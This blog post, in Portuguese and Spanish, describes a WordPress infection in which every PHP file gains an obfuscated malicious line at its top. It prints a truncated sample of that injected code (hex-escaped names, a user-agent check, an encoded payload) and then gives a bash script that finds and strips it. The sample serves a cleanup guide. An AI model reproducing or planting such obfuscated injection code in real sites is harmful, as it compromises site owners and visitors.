wordpess hackeado???

Deixe um comentário / comandos, linux, WHM/Cpanel, wordpress / Por

Todos los ficheros PHP de WordPress tienen en la primera linea una linea extraña, similar a:

...if(!isset($GLOBALS["\x616\x756\x61"])) { $ua=strtolower($_SERVER["\x484\x540\x5f5\x535\x527\x417\x456\x54"]); if ((! strstr($ua,"\x6d3\x695")) and (! strstr($ua,"\x726\x3a\x31"))) $GLOBALS["\x616\x756\x61"]=1; } ?><?php $bqrdwxkbia = '2f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x78277878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x782:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSV5c%x78257-K)fujs%x5c%x78#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%m%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x7825-#1GO%x5c%x7x5c%x787f_*#[k2%x5c%x785c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnb160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1627825h>#]y31]278]y3e]81]K78:56985:6197g:756<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFHfgg($n){return chr(ord($n)-1);} @error_repo%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf7fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~%x787f_*#ujojRk3%x5c%x7860{666~6%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osx5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x52qj%x5c%x7825)hopm3qjA)4985-rr.93e:5597f-s.973:8297f%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hudovg<~%x5c%x7824<!%x5c%x7825o:!>!5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**mpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bg<!gps)%x5c%x7825j:>1<%x5c%x7825j:x7825j>1<%x5c%x782\x712\x647\x783\x621\x61\x29\x3b\x2f\x204\x635\x6b2\x6d1\x7a1\x72\x2a\x20"; $pnzewsvbvw=substr($bqrdwxkbia,(54629-44516),(45-33)); $pnzewsvbvw($wngtpqemdp, $mwgebagebq, NULL); $pnzewsvbvw=$mwgebagebq; $pnzewsvbvw=(506-385); $bqrdwxkbia=$pnzewsvbvw-1;...


Correção:
./remove_malware.sh /var/www/wp_path/

Limpiar:

./remove_malware.sh /var/www/wp_path/ clean

Os dejamos a continuación el script (también podeis descargarlo aquí):

#!/bin/bash
#
# This script remove malware of PHP files.
#
# In this case it will remove some malicious code
# from all WordPress PHP files that is at top of
# every PHP file.
#
# The string at the top of every file is:
#
# ... if(!isset($GLOBALS["\x616\x756\x61"])) { 
# $ua=strtolower($_SERVER["\x484\x540\x5f5\x53\
# 105\x527\x417\x456\x54"]); if ((! strstr($ua,
# "\x6d ...
# 
# (PHP headers, and mostly all of the line, have been 
# removed to avoid anti-virus think the script is a virus)
#
# This script tries to find the string inside $_SERVER
# of the above line at the top of the files to determine
# if the file is infected. If you run the script and
# nothing seems to be infected but you suspect and you
# want to be sure, just open any PHP of WordPress and
# check if the malicious line code is present. If is
# present but the script did not detect, it is because
# the content inside $_SERVER may be diferent.
# In these cases, just replace in this script the string
# in the -e parameter of grep line with the content of
# $_SERVER found in your PHP (remember to escape
# the \ with \\\\) and run again this removal script.
#
#
# JavocSoft 2014
#
if [[ -z "$1" ]]; then
 echo "Directory where to find is required."
else
 grep -rnwl $1 --include \*.php -e "\\\\x48\\\4\\\\x54\\\0\\\\x5f\\\5\\\\x53\\\5\\\\x52\\\7\\\\x41\\\7\\\\x45\\\6\\\\x54" | while read -r filename ; do
if [[ ! -z "$2" ]]; then
 echo "Found file $filename. Cleaning..."
 awk 'BEGIN {matches=0} matches < 1 && /1/ { sub(/^.*<?php/,"<?php"); matches++ } { print $0 }' $filename > $filename.purged
 mv $filename $filename.bck
 mv $filename.purged $filename
 else
 echo "Found file $filename."
 fi
done
 echo "Done."
fi

 

 

 

http://javocsoft.es/archives/wordpress-hackeado-caso-y-desinfeccion/945

 

 

programa que causa isso:

http://memberdotmy.blogspot.com.br/2012/11/webcruiser-web-vulnerability-scanner.html

http://www.janusec.com/

Deixe um comentário